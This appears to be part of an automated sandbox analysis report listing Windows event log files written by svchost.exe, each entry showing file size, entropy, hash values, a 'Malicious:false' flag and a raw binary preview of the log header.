                                                Preview:ElfChnk......................................X...Y...k.c....................................................................:...................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................9@...............................=......**.. ..............f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.189544186987218
                                                Encrypted:false
                                                SSDEEP:384:thsmsmi7mRXZmVkWmhTimmdmBmKmPhmRTmimZ8mevmcsm7mrmQmzmjmvmTmmYmel:t2klTiGFKX93WGUGEeOg26
                                                MD5:292CAC5D0A9D14FD4055E281284E0615
                                                SHA1:8EF88640F3226F945BC727899576C349554DFD81
                                                SHA-256:DB9C26F9577893752630B735E605188A19478E2ADE66C01AA5351658E5684DFE
                                                SHA-512:B26BE503E899D1E7CA980B363E99ED07F39CBA01BF35F75E213D3346463934C3719EB474211C10951127B551609089AB400CD500911D5BE7D25E8F105AAE5F53
                                                Malicious:false
                                                Preview:ElfChnk.@-......o-......@-......o-..........(......."..*.....................................................................:.................\...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................5...c#..{1..k:...................v..........**..x...@-......U.hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.45619787222983577
                                                Encrypted:false
                                                SSDEEP:96:CNVaO8sMa3Z85ZMLkm3Z85ZP3Z85Z0z4rjjK3Z85Zu:UV7pp8nMLkmp8nPp8nKMvKp8n
                                                MD5:0FC4237BF3CD4A4F13AC34126A739A17
                                                SHA1:2F281241CC5FAA23A29161C5366BD6C4C21E1EB2
                                                SHA-256:6CF206321C32FE0A7EF92986DF07963336FFF60D407D2E130A9D641084F228B2
                                                SHA-512:3A27D1EEF61D35593E739BB30FC2D3E96021056959AD8C5DDFFA6BA295372E3DCFC7B1CD5BC09D69E4FBDC05654DB73419980D2F644D9B08FD890E1978BDDF9C
                                                Malicious:false
                                                Preview:ElfChnk.....................................@...............................................................................]..............................................=...........................................................................................................................f...............?...................................p...........M...F...............................................f...................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.467947111655398
                                                Encrypted:false
                                                SSDEEP:1536:xZPZn2bBN2A4VD7VAx8whAGU2woJQghwMvOUFwe8OQhNwRA:
                                                MD5:6B473E7917B1EDEE80CAFE7D24A6A4E8
                                                SHA1:1940F41550F2986C928648ED00F9C6E4868D1A23
                                                SHA-256:1D52F13D2EA4ACC472815240DBFF0F34C6CD5E86F980D04D9AD28E42C3E7A355
                                                SHA-512:9AABAD5B7425A9692545864C11B99DDED0051CE8B442FFAB7BAB21DD8CD68B51BC980B01F324A81C685DC56793581AE2E6751DD08497CCBA64FB3339A9B5483D
                                                Malicious:false
                                                Preview:ElfChnk.e.......h.......e.......h...............x....;.......................................................................Z}............................................=...............y...........................................................................................................L...............?...............................................M...F...............................................&...................................................................................n...............**......e..........f..........'.z&........'.z..^................A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.565838744973026
                                                Encrypted:false
                                                SSDEEP:1536:PXY5nVYIyyqED5BVZUe39vHxt1BSocM1:PXY5nVYIyyqED5BVZUe39vHxt1BSot
                                                MD5:B30C931B9EF047307E1443502CE7EE14
                                                SHA1:BAC3632B709B853DFFCD9C4D65D1F9236F6FE551
                                                SHA-256:033CF49641F4E76EFABF8F25753074E7EE72DD567FBA4145D446032D3D9CFADB
                                                SHA-512:F5A9CA2D464EBA1F2F4EA426AC3864FB399A8951958BA44BA550E2129C4F4D4DA9E60F0D1B18A07CC76D4BC2CFD20D283F446A47DF990B52916113D5383A1952
                                                Malicious:false
                                                Preview:ElfChnk.........~...............~...................F..........................................................................T................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................N...............y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):91344
                                                Entropy (8bit):2.4822122537855273
                                                Encrypted:false
                                                SSDEEP:384:Whdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorXorWorxFo8ormor8orn:WDCFxfDCFxH
                                                MD5:275C576D4BCC1D4CEB028B8C68813E0E
                                                SHA1:3F562D4F5270152E45626970C3B8D5542BAA0FFE
                                                SHA-256:0B8717F802EBF8DC6F6CE19C3E13A4B4E9309B1E8B0BCAB0D24801940A4D526F
                                                SHA-512:FDDCEDBDAD2B72A91FF641C9DA79AB892F02B013A267179FC184DCC95E561DEF19DB1C293158E73330B2E4E0F7AC2C83D3B1F7F1E515906963A4A759AC413998
                                                Malicious:false
                                                Preview:ElfChnk.....................................`J...L..:...........................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/....... ......U)..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8511209646626153
                                                Encrypted:false
                                                SSDEEP:384:ChAiPA5PNPxPEPHPhPEPmPSPRP3PoPbPfP0bPnPdP:C2NZ
                                                MD5:A98C811B8E1B821CD1FE05A68ADD446A
                                                SHA1:4E8B739F5E308F943962E72FF24212FFBE47FAD7
                                                SHA-256:58F6584C100174B80ACB8940226841B77884326A293CEE9072F4DD4CF8C10133
                                                SHA-512:24A7B9C86A6CE93B9B7F4107A433A247789EE568EB69E301B51DC9D01AA40D2F408AD76B78F7F83E5F4EB47C1677276BC86F86A99BAB95186C2331ABE4CA523C
                                                Malicious:false
                                                Preview:ElfChnk......................................%...&..?........................................................................<.m................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................ ..............'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8431535491551847
                                                Encrypted:false
                                                SSDEEP:384:OhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:OWXSYieD+tvgzmMvRQAsNi
                                                MD5:106F006ACA6287586EF71A10A5C06C4D
                                                SHA1:B4B6D91FF53E9BDFC8D0D99A0D6F643E49074932
                                                SHA-256:79E64A943AED80ADAE43934E4573F95AE7308DDD6FC896EEDDB386C8A41FBA65
                                                SHA-512:F4D49C8CBC2B46719521935DFABDC3E05883C2360D4E472920C420B1ACC74D0F835D10A2C5BA6E29038425809D585025172FDC9E534619C017D70FA4D9F23D53
                                                Malicious:false
                                                Preview:ElfChnk......................................$...&..{n.8.....................................................................{..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.0988330752830935
                                                Encrypted:false
                                                SSDEEP:384:xhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:xbCyhLfIIJ
                                                MD5:383AC4E465E28A79F2F748E86807EC50
                                                SHA1:EF7B52A6A9586F0752339E198ED02F0239920015
                                                SHA-256:86C407E10698BE804BAD07BD1DA7D24F631905F5800FA75C156D8D0C237280A8
                                                SHA-512:3FD344312C7164266DBDDF512BD8BD1735FDE5048752772BCBD3658D79F7895BF78F7DFEA724066290E579922773262EEAE2438D23E8330063C7012B4596921E
                                                Malicious:false
                                                Preview:ElfChnk.........K...............K...........H...0...7?6.....................................................................0...................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n................................................{......................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.318227577210551
                                                Encrypted:false
                                                SSDEEP:768:5cMhFBuyKskZljdoKXjtT/r18rQXn8BiJCF9Hhr:CMhFBuV
                                                MD5:5C633A280FB6049ED65FB3D9FB6ED41D
                                                SHA1:EA8D9B84B69F08E866CEE93019E7D9D2F2055666
                                                SHA-256:C173BD37497EC6CC0B01BDBD0F2813644D398457279644AEDA0F9925E546091F
                                                SHA-512:3E040021C7ABF4B9242BA0851F377EB0B077A1CFCAC0E012A4AB7E2551157BF7AC70E979A6F7225A3E260D5C393DBACAA78831C0BC46356C966A524271CC57CF
                                                Malicious:false
                                                Preview:ElfChnk.........M...............M..............8...^..Q....................................................................q...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A.........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.897188617668832
                                                Encrypted:false
                                                SSDEEP:768:6HCGQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZavAFDtCwvhr9aUS:fHu5
                                                MD5:3E0591299F722A0DAF8902BAF5ADB858
                                                SHA1:749457A4CBC1EBD2EE699A12C4FC4C0CEB830B53
                                                SHA-256:A933D2B22F2B300F28620F2AA0805734F091BFF2874D903BE5A75A1318464FDD
                                                SHA-512:263E8035314B849494CE8E743C482B4F3C3E3DCC97F85762EB395DB95256D1AC6A252BF21FDF93106E82AADA35DF07476624E74962F0FE176DD87BF2D75544EE
                                                Malicious:false
                                                Preview:ElfChnk.v.......x.......v.......x...........P...`...O8.#......................................................................29........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..@...v.......j.=.f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.9985877171483062
                                                Encrypted:false
                                                SSDEEP:384:Kh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDl:KMAP1Qa5AgfQQzy
                                                MD5:68155E5B9816828E2CEE7B72B9F87209
                                                SHA1:BB221A7C8FA313F96BC64ECD65A05CDD72F07828
                                                SHA-256:C2F1FAEAE043E0FE26A0F45D4EDCF18ED5F3A0372B4A1D86F8EAD9F4ACFE270A
                                                SHA-512:8D5C79D6B1FEBE9B106238D78091E8C8EEA5327F080A3FFF9BF8AB7C49D66D96C75418A5332058C8ECAD4A761D8B04058A401D1BA7B62379D58E150FF95DFDEF
                                                Malicious:false
                                                Preview:ElfChnk......................................c...f...g=........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&.......\......;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.441017411582523
                                                Encrypted:false
                                                SSDEEP:384:BhdERE5EUELEvE/EpEbEmEfEjoPjE4FEqEZEVEiEUhqEd/2EME0EHE+EIy4qEQi0:BQoPjvh7jhHl7lzuzbCN7y+D
                                                MD5:8D30244BF7119CFA2F8A7A5AF8FCDAB7
                                                SHA1:F0827675265E0DF98A4967D8A539D476551DCAA6
                                                SHA-256:489E810931FD45E6D7620FE65EBF1F1A66235B06E572C2C293BD080EE1C8E1ED
                                                SHA-512:C71504A8F8D370825FC0C8C605B9F7217EFF2025838ED8FDF3F04CCC41E86751659BB60C7E79C48BBDDC1089C771DD16A193C107DDE4A1487F037BB2FC1455B8
                                                Malicious:false
                                                Preview:ElfChnk.q...............q....................i..Pk..buI......................................................................o._................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F........................................7...(..................};...........?..M=.......9..............U*..&....$..........."..............=1......**......q........|.xf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.2803522685445374
                                                Encrypted:false
                                                SSDEEP:384:RhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl0:R1T4hZovIZC7
                                                MD5:4A70DB2946C129829BEDDB2E147FBE04
                                                SHA1:4D3255FABE0E857840591072D9370047FDDFB83A
                                                SHA-256:C10981A84E3884E62907E34159FB7AA2D1F908C3E328D8D8B942B9934DFDE09C
                                                SHA-512:7FDBE43D4773CBC17A3879CBC012F8C9FC823529DDF6FE5E10C623B2D7AA89159132F10FE01C0632B6F8F92A0C474C67EF1D5DA4DC2EDC3CA5499D6220922AA4
                                                Malicious:false
                                                Preview:ElfChnk.........k...............k...........................................................................................<../................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.445920452673848
                                                Encrypted:false
                                                SSDEEP:384:ihFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDff:izSKEqsMuy6SbKrTPpOIKm
                                                MD5:21B26F726BBEBA7FD5C4C45386FC544F
                                                SHA1:F6CC3E80D2AD9D2F420C42D7DA3AA3C48C9D956A
                                                SHA-256:63E1A62EA280BF1B031E1C98FBF21FF88795119983E5BC96C036B8EEF30D325D
                                                SHA-512:A28CB789E4967DB231359AFE7D221C55A57FB56EF899997EBAA0F79EBD92D34547530A64B4B5492400ABFC81631E5ED792D47B836525E5E1583BA6F656062DD5
                                                Malicious:false
                                                Preview:ElfChnk.........L...............L......................f....................................................................s.J.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=........................................f......................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.1562721664799103
                                                Encrypted:false
                                                SSDEEP:384:BhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3z2:Bmw9g3LQ
                                                MD5:B2C3D7448B237C268D23FE1A78777AA5
                                                SHA1:6C3A39325392F2B088C00CDC1763268F15832447
                                                SHA-256:05BC150DCBE6B62CE7D2A9CB8F706130DF70BABC54752199B02B4C91ACEE1C4E
                                                SHA-512:F9286BC0FC6DB6C52295C0292E2BF732C010F2D542999085F999501AC555C317FB1AFED9A2FF2DF6D91913373D0A32D2307C707381419883F5605F1D67DEE70E
                                                Malicious:false
                                                Preview:ElfChnk.........6...............6...........(o...p....Zo....................................................................ZU.#................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#.......................................^^......................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.9195298486885948
                                                Encrypted:false
                                                SSDEEP:384:3hPIRbiY8SIUIi0IsIGIAICI5I2IBIaIKI+I3lKaZrIVlKaZOITTIwI:3LQ9KC8KCV
                                                MD5:D4A00CC59E964B7DFD6EFDB643322E9E
                                                SHA1:7307AF862B22D743BF6B531829DABE041E9F1F92
                                                SHA-256:49414D51861772E0899416FE42628F8641622E9F793F435DE7F0118F45EDE065
                                                SHA-512:51663BF2E9D8F1FA3BA6B87918CD36A02AFC2F53FF89F3ED104A4B4129682F0947DC825912A81844E2D25083E7249CE7C1EE8F899D847F511AB20B0404B22F27
                                                Malicious:false
                                                Preview:ElfChnk.K.......L.......K.......L...........x...86..........................................................................E.U.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..x...K.......1..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.119748237037944
                                                Encrypted:false
                                                SSDEEP:384:Sh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpRaMRlM7kMGU:SeJB
                                                MD5:D1CFC256BC075DC75D7FD92207C9C0F2
                                                SHA1:587C19CF65305AD470E82AB5A1ED5B2E36472625
                                                SHA-256:6C0365C674BCE55E0C49A62D23782660D34ECB388A8A7418AD9A75DFD36E612E
                                                SHA-512:85F88C26274975D8EB8DDC65297064427A103B557712BD46F459B8E26A1B7E38DA3B4674920FA61476D108BA3B9846430F59AA82926AFEBDCE92B25A527331A3
                                                Malicious:false
                                                Preview:ElfChnk......................................1..p3..\q........................................................................_U........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................,......................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.182756017330751
                                                Encrypted:false
                                                SSDEEP:384:9hk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1B:9BjdjP0csdHkp
                                                MD5:9BA8F6B60705B6A27084436D1D4370AD
                                                SHA1:DCAFEC9C3F76CCE3FF65F8FED6E373B863780B6E
                                                SHA-256:580E71D95D6201104E37944E8A0A6596869D6C8A0CA2CD3B704FEFC9D319C957
                                                SHA-512:BFBAEA71174AEE5233857BFDB4427C59D945A3797EA6F5D02708807321E0ADD12ED632BAA3C5E59141CFEF108FADE90315AB670BB960A281D0E95DB18C4976A4
                                                Malicious:false
